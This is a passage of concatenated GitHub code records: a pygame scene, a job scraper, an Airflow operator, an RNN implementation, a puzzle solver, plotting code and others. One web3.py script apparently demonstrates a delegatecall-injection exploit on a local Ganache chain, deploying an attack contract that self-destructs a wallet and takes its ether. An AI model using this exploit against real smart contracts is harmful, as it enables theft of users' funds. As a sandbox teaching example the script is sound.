center=(self.engine.HALF_WIDTH, self.engine.HEIGHT*0.9), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n return;\n def update(self,pygame):\n self.tick += 1\n if self.engine.controller.keyboard_pressed[pygame.K_RETURN]:\n self.engine.sounds.pause.play()\n # self.engine.change_scene(\"CHAPTHER_SELECTER\", background=\"dark-wood\", enemys=[])\n if not self.current_music == chapthers[self.current_chapther][\"music\"]:\n self.current_music = chapthers[self.current_chapther][\"music\"]\n self.engine.music.play(self.current_music)\n for chapther in chapthers:\n chapther[\"offset_x\"] += (chapther[\"offset_x_target\"] - chapther[\"offset_x\"]) / 16\n return;\n def on_key_down(self, key, mod, unicode, pygame):\n if key == pygame.K_a or key == pygame.K_LEFT:\n self.current_chapther -= 1\n if key == pygame.K_d or key == pygame.K_RIGHT:\n self.current_chapther += 1\n if key == pygame.K_RETURN or key == pygame.K_e:\n chapther = chapthers[self.current_chapther]\n self.engine.change_scene(\"GAME\", background=chapther[\"background\"], enemys=chapther[\"enemys\"], music=chapther[\"music\"])\n self.engine.sounds.pause.play()\n if key == pygame.K_ESCAPE:\n self.engine.change_scene(\"INTRO\")\n self.current_chapther = min(max(self.current_chapther,0),len(chapthers)-1)\n chapthers[self.current_chapther][\"offset_x_target\"] = 0\n for i,chapther in enumerate(chapthers):\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n","repo_name":"chanios/project-pygame","sub_path":"game/scenes/chapther_selecter.py","file_name":"chapther_selecter.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33747995759","text":"'''\nTopic class to simulate course topic\nAuthor : Mayuri Wadkar\n'''\n\nfrom Utils import technologies_stopwords, fetch_description_techs\nfrom SummarizationModule import *\nfrom bs4 import BeautifulSoup as Soup\nimport urllib\n\nclass Topic:\n\n def __init__(self):\n self.cluster = None\n self.topic = None\n self.technologies = None\n self.listedTech = None\n self.actionList = None\n self.summary = None\n\n '''\n Function to initiate extraction of course topic, technologies, action lists and summary\n '''\n def set_syllabus_content(self):\n\n job_closest_to_centroid = self.cluster.closest_job_document\n description_of_job_closest_to_centroid, techSet_of_job_closest_to_centroid = fetch_description_techs(job_closest_to_centroid.jobLink)\n title_of_job_closest_to_centroid = job_closest_to_centroid.jobTitle\n\n #integration with NLP\n job_descriptions = \"\"\n # job_titles = \"\"\n technologies = set()\n\n for job in self.cluster.cluster:\n url = job.jobLink\n # print job.jobLink\n joblinkTarget = Soup(urllib.urlopen(url), \"html.parser\")\n techTags = joblinkTarget.findAll('a', attrs={'class': 'post-tag job-link no-tag-menu'})\n for tag in range(len(techTags)):\n tech = str(techTags[tag].get_text())\n if tech not in technologies_stopwords:\n technologies.add(tech)\n\n job_description = joblinkTarget.find('div', attrs={'class': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('span', attrs={'class': 'summary'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('div', attrs={'itemprop': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n if job_description != None:\n job_descriptions += job_description\n # job_titles += job.jobTitle\n\n summarizer = SummarizationModule()\n\n self.summary = summarizer.summarize_job_descriptions(job_descriptions)\n self.listedTech, self.actionList = summarizer.get_listed_tech_and_action_list(job_descriptions)\n self.technologies = technologies\n self.topic = summarizer.get_topic(title_of_job_closest_to_centroid)","repo_name":"Mayuri-Wad-012447851/Course-Recommendation-Project","sub_path":"Topic.py","file_name":"Topic.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33531897299","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom helpers import SqlQueries\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nclass PreProcessAndLoadOperator(BaseOperator):\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n redshift_table_name,\n redshift_conn_id='redshift',\n month_name = 'October',\n truncate=True,\n *args, **kwargs):\n\n super(PreProcessAndLoadOperator, self).__init__(*args, **kwargs)\n self.table_name=redshift_table_name\n self.redshift_conn_id = redshift_conn_id\n self.truncate = truncate\n self.month_name = month_name\n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n df = redshift.get_pandas_df(SqlQueries.select_from_table.format(table_name=self.table_name))\n\n df = df.sort_values(['country', 'date'])\n df['confirmed'] = df.groupby(['country'])['confirmed'].diff().fillna(0)\n df['recovered'] = df.groupby(['country'])['recovered'].diff().fillna(0)\n df['deaths'] = df.groupby(['country'])['deaths'].diff().fillna(0)\n df['date'] = pd.to_datetime(df['date'])\n df = df[df['date'].dt.month_name()== self.month_name]\n\n if self.truncate:\n redshift.run(SqlQueries.truncate_table.format(table_name=\"covid_cases\"))\n\n rows = list(df.itertuples(index=False, name=None))\n redshift.insert_rows(table=\"covid_cases\", rows=rows, commit_every=0)\n \n","repo_name":"MBtech/data-eng-capstone","sub_path":"airflow/plugins/operators/preprocess_and_load.py","file_name":"preprocess_and_load.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11271437231","text":"\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import to_categorical\r\n\r\nclass RNN_func:\r\n\t\r\n\tdef __init__(self, word_dim, hidden_dim=4, bptt_truncate=0):\r\n # Khởi tạo thông số cơ bản (vocabulary, lớp ẩn)\r\n\t\tself.word_dim = word_dim\r\n\t\tself.hidden_dim = hidden_dim\r\n\t\tself.bptt_truncate = bptt_truncate\r\n # Khởi tạo thông số mạng ngẫu nhiên\r\n\t\tself.U = np.random.uniform(-np.sqrt(1./word_dim), np.sqrt(1./word_dim), (hidden_dim, word_dim))\r\n\t\tself.V = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (word_dim, hidden_dim))\r\n\t\tself.W = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))\r\n\r\n\tdef forward_propagation(self, x):\r\n # Tông số time steps\r\n\t\tT = len(x)\t\t\r\n\t\t# Lưu lại các giá trị lớp ra o và lớp ẩn s để sử dụng sau này\r\n\t\ts = np.zeros((T, self.hidden_dim))\r\n\t\ts[-1] = np.zeros(self.hidden_dim)\r\n\t\t\r\n\t\to = np.zeros((T, self.word_dim))\r\n\t\t# Tính o và s theo công thức\r\n\t\t# s[t] = tanh(U.x[t] + W.s[t-1])\r\n\t\t# o[t] = softmax(V.s[t])\r\n\t\tfor t in np.arange(T):\r\n\t\t \r\n\t\t\ts[t] = np.tanh(self.U[:,x[t]] + self.W.dot(s[t-1]))\r\n\t\t\to[t] = softmax(self.V.dot(s[t]))\r\n\t\treturn [o, s]\r\n \r\n\t\r\n\tdef predict(self, x):\r\n\t\t# Tính lan truyền thuận và với giá trị U, V, W sau khi training để dự đoán kết quả \r\n\t\to, s = self.forward_propagation(x)\r\n\t\ty_pre = np.argmax(o, axis=1) + 1\t\t \r\n\t\treturn y_pre[len(y_pre)-1] \r\n\r\n\r\n\tdef calculate_total_loss(self, x, y):\r\n\t#Tính sai số theo cross-entropy\t\t\t\t\r\n\t\to, s = self.forward_propagation(x)\r\n\t\t#Tạo one-hot vector\r\n\t\ty_temp = to_categorical(y, num_classes=5)\r\n\t\ty_temp = np.delete(y_temp,0,1)\r\n\t\t\r\n\t\tE = (- np.mean(np.sum(y_temp * np.log(o), axis=1)))\r\n\t\t\r\n\t\treturn E \r\n\r\n\r\n\tdef bptt(self, x, y):\r\n\t#Tính backpropagation through time\r\n\t T = len(y)\r\n\t # Tính lan truyền thuận\r\n\t o, s = self.forward_propagation(x)\r\n\t # Đạo hàm sai số theo U, L, W\r\n\t dEdU = np.zeros(self.U.shape)\r\n\t dEdV = np.zeros(self.V.shape)\r\n\t dEdW = np.zeros(self.W.shape)\r\n\t delta_o = o\r\n\t \r\n\t delta_o[np.arange(len(y)), y-1] -= 1\t \r\n\t \r\n\t # Mỗi bước ngược\r\n\t for t in np.arange(T)[::-1]:\r\n\t dEdV += np.outer(delta_o[t], s[t].T)\r\n\t # Khởi tạo delta_t\r\n\t delta_t = self.V.T.dot(delta_o[t]) * (1 - (s[t] ** 2))\r\n\t # Backpropagation through time theo chuỗi ngược liên tiếp \r\n\t for bptt_step in np.arange(max(0, t-self.bptt_truncate), t+1)[::-1]:\t \r\n\t dEdW += np.outer(delta_t, s[bptt_step-1]) \r\n\t dEdU[:,x[bptt_step]] += delta_t\r\n\t # update cho bước kế tiếp\r\n\t delta_t = self.W.T.dot(delta_t) * (1 - s[bptt_step-1] ** 2)\r\n\t return [dEdU, dEdV, dEdW]\r\n \t \r\n\t\r\n\r\n\tdef numpy_sgd_step(self, x, y, learning_rate):\r\n\t\t# tính gradient của sai số\r\n\t\tdEdU, dEdV, dEdW = self.bptt(x, y)\r\n\t\t# Cập nhật trọng số theo gradient\r\n\t\tself.U -= learning_rate * dEdU\r\n\t\tself.V -= learning_rate * dEdV\r\n\t\tself.W -= learning_rate * dEdW\r\n\r\n\t\r\n# SGD Loop\r\n# - model: RNN model \r\n# - X_train: training data set\r\n# - y_train: training data labels\r\n# - learning_rate: Khởi tạo learning rate cho SGD\r\n# - nepoch: số lượng epoch\r\n# - evaluate_loss_after: Đánh giá sai số sau mỗi k epoch\r\ndef train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=100, evaluate_loss_after=1):\r\n # Theo dõi sai số\r\n losses = []\r\n num_examples_seen = 0\r\n for epoch in range(nepoch):\r\n \r\n if (epoch % evaluate_loss_after == 0):\r\n loss = model.calculate_total_loss(X_train, y_train) \r\n losses.append(loss)\r\n \r\n #Chỉnh lại learning rate nếu sai số tăng lên\r\n if (len(losses) > 1 and losses[-1]> losses[-2]):\r\n learning_rate = learning_rate * 0.75 \r\n print (\"Setting learning rate to %f\" % learning_rate)\r\n sys.stdout.flush()\r\n \r\n # One SGD step\r\n model.numpy_sgd_step(X_train, y_train, learning_rate)\r\n num_examples_seen += 1 \r\n \r\n return losses\r\n\r\ndef softmax(x):\r\n#Hàm softmax\r\n xt = np.exp(x - np.max(x))\r\n return xt / np.sum(xt)","repo_name":"luonghuuphuloc/artificial-inteligence-in-control","sub_path":"Recurrent-neural-network/RNN_BPTT/RNN_backpropagation.py","file_name":"RNN_backpropagation.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30502467650","text":"from test.utils import describe, it\nfrom unittest import TestCase, mock\n\nfrom src.adapter.local_file import LocalFileAdapter\n\n\nclass LocalFileTestCase(TestCase):\n @mock.patch(\n \"src.adapter.local_file.open\",\n new=mock.mock_open(read_data=\"filecontent\"),\n )\n @mock.patch(\"src.adapter.local_file.BytesIO\")\n @mock.patch(\"src.adapter.local_file.os\")\n @describe\n def test_uri(self, mock_os, mock_bytesio):\n @it\n def raises_if_the_input_is_not_dir():\n mock_os.path.isfile.return_value = False\n self.assertRaises(\n ValueError, LocalFileAdapter.load, *[\"./an-image\"]\n )\n\n mock_os.path.isfile.return_value = True\n mock_bytesio.return_value = \"some bytes\"\n\n @it\n def loads_a_remote_image():\n result = LocalFileAdapter.load(\"file.jpg\")\n mock_bytesio.assert_called_with(\"filecontent\")\n self.assertEqual(\"some bytes\", result)\n\n @it\n def does_not_load_a_file_with_invalid_extension():\n result = LocalFileAdapter.load(\"file.txt\")\n self.assertEqual(None, result)\n","repo_name":"melnyczuk/supercollager","sub_path":"test/unit/adapter/local_file_test.py","file_name":"local_file_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26710971899","text":"# the extension solver of the 4 = 10 problem\n\"\"\"three or more numbers and operators, goal are given,\n this solver finds the formula that results goal\"\"\"\n \n# MAINTENANCE IS CONSIDERED\n\nfrom operator import truediv\nfrom itertools import permutations, product \n\n############################################\n############# MODIFY HERE ##################\n############################################\n \nnumbers = [3, 4, 7, 8] \noperators = ['+', '-', '*', '/'] \ngoal = 10 \nbracket = False \n \n############################################\n############################################\n############################################\n\n\ndef FindBrackPos(n) :\n tmpPos = []\n for i in range(0, 2 * n - 3, 2) :\n for j in range(2, 2 * n + 1, 2) :\n if j - i > 2 and j - i != 2*n:\n tmpPos.append((i, j))\n return tmpPos\n\n\ndef Solver(nums, opers, goal, bracket=True) :\n n = len(nums)\n brackPos = FindBrackPos(n)\n numList = list(set(permutations(nums, n)))\n operitem = []\n for _ in range(n - 1) :\n operitem.append(opers)\n operitem.append([\"\"])\n operList = list(product(*operitem))\n \n for i in numList :\n for j in operList :\n form = \"\"\n for k in range(n) : form += str(i[k]) + j[k]\n \n try :\n if abs(eval(form) - goal) < 0.01 : print(form)\n except ZeroDivisionError : continue\n \n if bracket : \n for k in brackPos :\n tmpform = form[0:k[0]] + \"(\" + form[k[0]:k[1]-1] + \")\" + form[k[1]-1:2*n+1] \n try :\n if abs(eval(tmpform) - goal) < 0.01 : print(tmpform)\n except ZeroDivisionError : continue \n\nSolver(numbers, operators, goal, bracket)\n","repo_name":"Jenix8/4equal10-Solver","sub_path":"n=m.py","file_name":"n=m.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7965408400","text":"from web3 import Web3\nfrom web3 import contract as c\n\nfrom solcx import compile_files\n\n\ndef get_contract_abi_bin(contract_file):\n\n compiled_sol = compile_files( contract_file,\n output_values=['abi', 'bin']\n )\n return compiled_sol\n\ndef deploy_contract(abi, bin, target_address = None):\n\n Contract = w3.eth.contract(abi=abi, bytecode=bin)\n if(target_address == None):\n #DEPLOY WALLET WITH 50 Ether\n contract_type = \"WALLET\"\n tx_hash = Contract.constructor().transact({'gasPrice': w3.eth.gas_price,'value': 50000000000000000000})\n else:\n #ELSE DEPLOY ATTACK CONTRACT\n contract_type = \"ATTACKER\"\n tx_hash = Contract.constructor(target_address).transact()\n tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)\n contract = w3.eth.contract(\n address=tx_receipt.contractAddress,\n abi=abi\n )\n print(f\"{contract_type} CONTRACT DEPLOY WITH ADDRESS: {contract.address}\")\n return contract\n\n#### CONNECT WEB3PY TO GANACHE\nw3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8545'))\naccounts = w3.eth.accounts\n\nw3.eth.default_account = accounts[0]\n\ncompiled_contracts = get_contract_abi_bin(\"./WalletSelfDestructableByAnyone.sol\")\n\nfor ctr in compiled_contracts:\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Attack'):\n attack_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Wallet'):\n wallet_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n\n##### DEPLOY WALLET WITH ACCOUNT 0\nwallet = deploy_contract(wallet_abi_bin[0], wallet_abi_bin[1])\nwallet = c.ImplicitContract(wallet)\n\n##### DEPLOY ATTACK WITH ACCOUNT 1\nw3.eth.default_account = accounts[1]\nattack_init_balance = w3.eth.get_balance(accounts[1])\nattack = deploy_contract(attack_abi_bin[0], attack_abi_bin[1], wallet.address)\n\nattack_address = attack.address\n\ntry:\n wallet.delegateCallToAnotherContract(attack_address)\nexcept Exception as e:\n print(e)\n print(\"Not owner.\")\n exit(0)\n\nstolen_ether = w3.eth.get_balance(accounts[1])-attack_init_balance\nstolen_ether = w3.fromWei(stolen_ether, 'ether')\nprint(f\"\\nAttacker was able to self destruct and steal {stolen_ether} from Wallet: {wallet.address}\")\n \n\n","repo_name":"jcrreis/solidity-tools-sandbox","sub_path":"Examples/DelegateCallInjection/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10839466183","text":"\"\"\"\nNBScratch: Jupyter Notebook Extension placing a computational scratchpad in the\nnotebook\n\"\"\"\n\nimport os\nimport json\nimport datetime\n\nfrom notebook.utils import url_path_join\nfrom notebook.base.handlers import IPythonHandler, path_regex\n\nclass NBScratchHandler(IPythonHandler):\n\n # manage connections to various sqlite databases\n db_manager_directory = {}\n\n # check if extension loaded by visiting http://localhost:8888/api/nbscratch\n def get(self, path=''):\n \"\"\"\n Handle GET request\n \"\"\"\n\n html = \"

NBScratch is working

\"\n self.write(html)\n\n def post(self, path=''):\n \"\"\"\n Handle POST request\n \"\"\"\n\n print(\"Just got the NBScratch POST requst\")\n self.finish(json.dumps({'time': datetime.now()}))\n\ndef _jupyter_server_extension_paths():\n \"\"\"\n Jupyter server configuration\n returns dictionary with where to find server extension files\n \"\"\"\n return [{\n \"module\": \"nbscratch\"\n }]\n\ndef _jupyter_nbextension_paths():\n \"\"\"\n Jupyter nbextension configuration\n returns dictionary with where to find nbextension files\n \"\"\"\n return [dict(\n section=\"notebook\",\n # the path is relative to the `nbscratch` directory\n src=\"static\",\n # directory in the `nbscratch/` namespace\n dest=\"nbscratch\",\n # _also_ in the `nbscratch/` namespace\n require=\"nbscratch/main\")]\n\ndef load_jupyter_server_extension(nb_app):\n \"\"\"\n Load the server extension and set up routing to proper handler\n nb_app: (obj) Jupyter Notebook Application\n \"\"\"\n\n nb_app.log.info('NBScratch Server extension loaded')\n web_app = nb_app.web_app\n host_pattern = '.*$'\n route_pattern = url_path_join(web_app.settings['base_url'],\n r\"/api/nbscratch%s\" % path_regex)\n web_app.add_handlers(host_pattern, [(route_pattern, NBScratchHandler)])\n","repo_name":"acrule/nbscratch","sub_path":"nbscratch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70027269552","text":"Boss = False\nYou = 5\nEnemy = 5\nBoss_hp = 10\n\nwhile Enemy == 5:\n print(\"Enemy still stands\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 5:\n print(\"You defeated it!\")\n Enemy = 0\n break\n\n elif Attack <= 5:\n print(\"You did not do enough damage.\")\n\nif Enemy == 0:\n Boss = True\n\nwhile Boss == True:\n print(\"The boss stands before you\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 10:\n print(\"The boss falls\")\n print(\"Congratulations!\")\n break\n\n elif Attack <= 10:\n print(\"the boss survives and counters! Deals 3 damage!\")\n You = You - 3\n\n if You <= 0:\n print(\"YOU DIED\")\n exit()\n\n\n\n\n","repo_name":"Blackisrafil/testproject","sub_path":"practice projects/Def practice.py","file_name":"Def practice.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35407448783","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pandas import Grouper\r\nfrom data.nn_data.datasets.truck_dataset import TruckDataSet\r\nfrom data.nn_data.instance_segmentation_data import InstanceSegmentationData\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom pathlib import Path\r\n\r\nfrom data.user_data.eye_data import EyeData\r\nfrom data.user_data.hand_data import HandData\r\nfrom data.user_data.head_data import HeadData\r\nfrom math_helper.math_helper import MathHelper\r\nimport constants\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nfrom sklearn.metrics import roc_curve, auc, RocCurveDisplay, roc_auc_score, confusion_matrix, ConfusionMatrixDisplay\r\n\r\nfrom itertools import cycle\r\n\r\n\r\nclass Visualizer():\r\n\r\n def __init__(self) -> None:\r\n pass\r\n\r\n def visualize_head_data(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n head_labels: list[list[str]]) -> None:\r\n\r\n first_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 1]\r\n second_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 2]\r\n third_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 3]\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n index = 0\r\n image_index = 0\r\n\r\n x_label = \"x - coord\"\r\n x_range = [-1, 1]\r\n y_label = \"y - coord\"\r\n y_range = [-1, 1]\r\n z_label = \"z - coord\"\r\n z_range = [-1, 1]\r\n\r\n labels = [\"FirstIntention\", \"SecondIntention\", \"ThirdIntention\"]\r\n marker = ['o', 'o', 'o']\r\n colors = [\"aqua\", \"fuchsia\", \"lawngreen\"]\r\n marker_size = 1\r\n\r\n ax.scatter(first_intention[head_labels[0][0]], first_intention[head_labels[0][2]], first_intention[head_labels[0][1]],\r\n marker=marker[0],\r\n s=marker_size,\r\n color=colors[0],\r\n label=labels[0])\r\n \r\n ax.scatter(second_intention[head_labels[0][0]], second_intention[head_labels[0][2]], second_intention[head_labels[0][1]],\r\n marker=marker[1],\r\n s=marker_size,\r\n color=colors[1],\r\n label=labels[1])\r\n \r\n ax.scatter(third_intention[head_labels[0][0]], third_intention[head_labels[0][2]], third_intention[head_labels[0][1]],\r\n marker=marker[2],\r\n s=marker_size,\r\n color=colors[2],\r\n label=labels[2])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(z_label)\r\n ax.set_ylim(z_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"Head data from one user\")\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + \"AllUsers/Head\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.show()\r\n plt.savefig(path + \"/\" + f\"HeadData.png\")\r\n plt.close()\r\n\r\n def visualize_all_2d_positions_screen_space(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n position_labels: list[list[str]],\r\n user_name: str,\r\n intention: str,\r\n marker: list[str] = ['o', 'x', 'x'],\r\n visualize_bursts: bool = True,\r\n step_size: int = 5,\r\n offset: int = 0,\r\n colors: list[str] = ['b', 'g', 'r'],\r\n visualize_3d: bool = True,\r\n burst_size: int = constants.SLIDING_WINDOW_SIZE) -> None:\r\n\r\n labels = [\"Eye\", \"Right Hand\", \"Left Hand\"]\r\n\r\n index = 0\r\n image_index = 0\r\n while ((index + burst_size) < df_tracking_data_preprocessed.shape[0]):\r\n\r\n if visualize_3d:\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n\r\n for position_label_index, position_label in enumerate(position_labels):\r\n\r\n positions = df_tracking_data_preprocessed[position_label].to_numpy()\r\n\r\n correct_x_positions = np.logical_and(positions[:, 0] >= -1, positions[:, 0] <= 1)\r\n correct_y_positions = np.logical_and(positions[:, 1] >= -1, positions[:, 1] <= 1)\r\n correct_positions = np.logical_and(correct_x_positions, correct_y_positions)\r\n\r\n\r\n positions = positions[correct_positions]\r\n # we ignore the very first and very last samples\r\n positions = positions[offset:-offset]\r\n if (positions.shape[0] == 0):\r\n continue\r\n position_x = positions[:, 0]\r\n position_y = positions[:, 1]\r\n\r\n from_index = index\r\n to_index = from_index + burst_size\r\n burst_position_x = position_x[from_index:to_index]\r\n burst_position_y = position_y[from_index:to_index]\r\n\r\n # here go from screen space to NDC\r\n burst_position_x = ((burst_position_x + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X\r\n burst_position_y = ((burst_position_y + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y\r\n\r\n x_label = \"x - coord\"\r\n x_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X]\r\n y_label = \"y - coord\"\r\n y_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y]\r\n\r\n if visualize_3d:\r\n\r\n time_axis = np.arange(len(burst_position_x))\r\n\r\n ax.scatter(burst_position_x, time_axis, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(\"time\")\r\n # ax.set_ylim(y_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"User data with {intention} over #{burst_size} samples burst\")\r\n\r\n else:\r\n \r\n plt.title(f\"Accumulated user data with {intention} over #{burst_size} samples burst\")\r\n plt.xlabel(x_label)\r\n plt.ylabel(y_label)\r\n plt.xlim(x_range)\r\n plt.ylim(y_range)\r\n plt.scatter(burst_position_x, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention + \"/\" + \"Bursts\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.savefig(path + \"/\" + f\"Accumulated user data from {user_name} with intention {intention} burst {image_index}.png\")\r\n plt.close()\r\n index += step_size\r\n image_index += 1\r\n\r\n def compare_different_burst_sizes(self,\r\n different_burst_sizes) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n x = []\r\n y = []\r\n for index in range(len(different_burst_sizes)):\r\n x.append(different_burst_sizes[index][0])\r\n y.append(different_burst_sizes[index][1][\"mean_test_balanced_accuracy\"])\r\n\r\n plt.title(\"Compare different burst sizes\")\r\n plt.plot(x, y, label='compare burst sizes')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"BurstSizesCompare.png\")\r\n plt.close()\r\n\r\n\r\n\r\n def plot_losses(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n loss_curve = clf.best_estimator_[1].loss_curve_\r\n\r\n plt.title(\"Training losses\")\r\n plt.plot(loss_curve, label='losses')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Losses.png\")\r\n plt.close()\r\n\r\n def plot_accuracy(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n colors = [\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"]\r\n\r\n validation_scores = clf.best_estimator_[1].validation_scores_\r\n\r\n plt.plot(validation_scores, label='validation scores', color=colors[0])\r\n\r\n plt.title(\"Accuracy\")\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Accuracy.png\")\r\n plt.close()\r\n\r\n\r\n def plot_confusion_matrix(self, clf, X_test, y_test, burst_size: int) -> None:\r\n\r\n predictions = clf.predict(X_test)\r\n cm = confusion_matrix(y_test, predictions, labels=clf.classes_)\r\n disp = ConfusionMatrixDisplay(confusion_matrix=cm,\r\n display_labels=clf.classes_)\r\n disp.plot()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"ConfusionMatrix.png\")\r\n plt.close()\r\n\r\n\r\n def plot_all_OvR_ROC_curves(self, model, testX, testY,\r\n class_labels: list[str],\r\n label_binarizer,\r\n burst_size: int) -> None:\r\n\r\n y_score = model.predict_proba(testX)\r\n n_classes = 4\r\n\r\n fig, ax = plt.subplots(figsize=(6, 6))\r\n\r\n y_onehot_test = label_binarizer.transform(testY)\r\n\r\n fpr, tpr, roc_auc = dict(), dict(), dict()\r\n # Compute micro-average ROC curve and ROC area\r\n aux1 = testY.ravel()\r\n aux2 = y_score.ravel()\r\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_onehot_test.ravel(), y_score.ravel())\r\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\r\n\r\n plt.plot(\r\n fpr[\"micro\"],\r\n tpr[\"micro\"],\r\n label=f\"micro-average ROC curve (AUC = {roc_auc['micro']:.2f})\",\r\n color=\"deeppink\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n for i in range(n_classes):\r\n\r\n fpr[i], tpr[i], _ = roc_curve(y_onehot_test[:, i], y_score[:, i])\r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n\r\n fpr_grid = np.linspace(0.0, 1.0, 1000)\r\n\r\n # Interpolate all ROC curves at these points\r\n mean_tpr = np.zeros_like(fpr_grid)\r\n\r\n for i in range(n_classes):\r\n mean_tpr += np.interp(fpr_grid, fpr[i], tpr[i]) # linear interpolation\r\n\r\n # Average it and compute AUC\r\n mean_tpr /= n_classes\r\n\r\n fpr[\"macro\"] = fpr_grid\r\n tpr[\"macro\"] = mean_tpr\r\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], 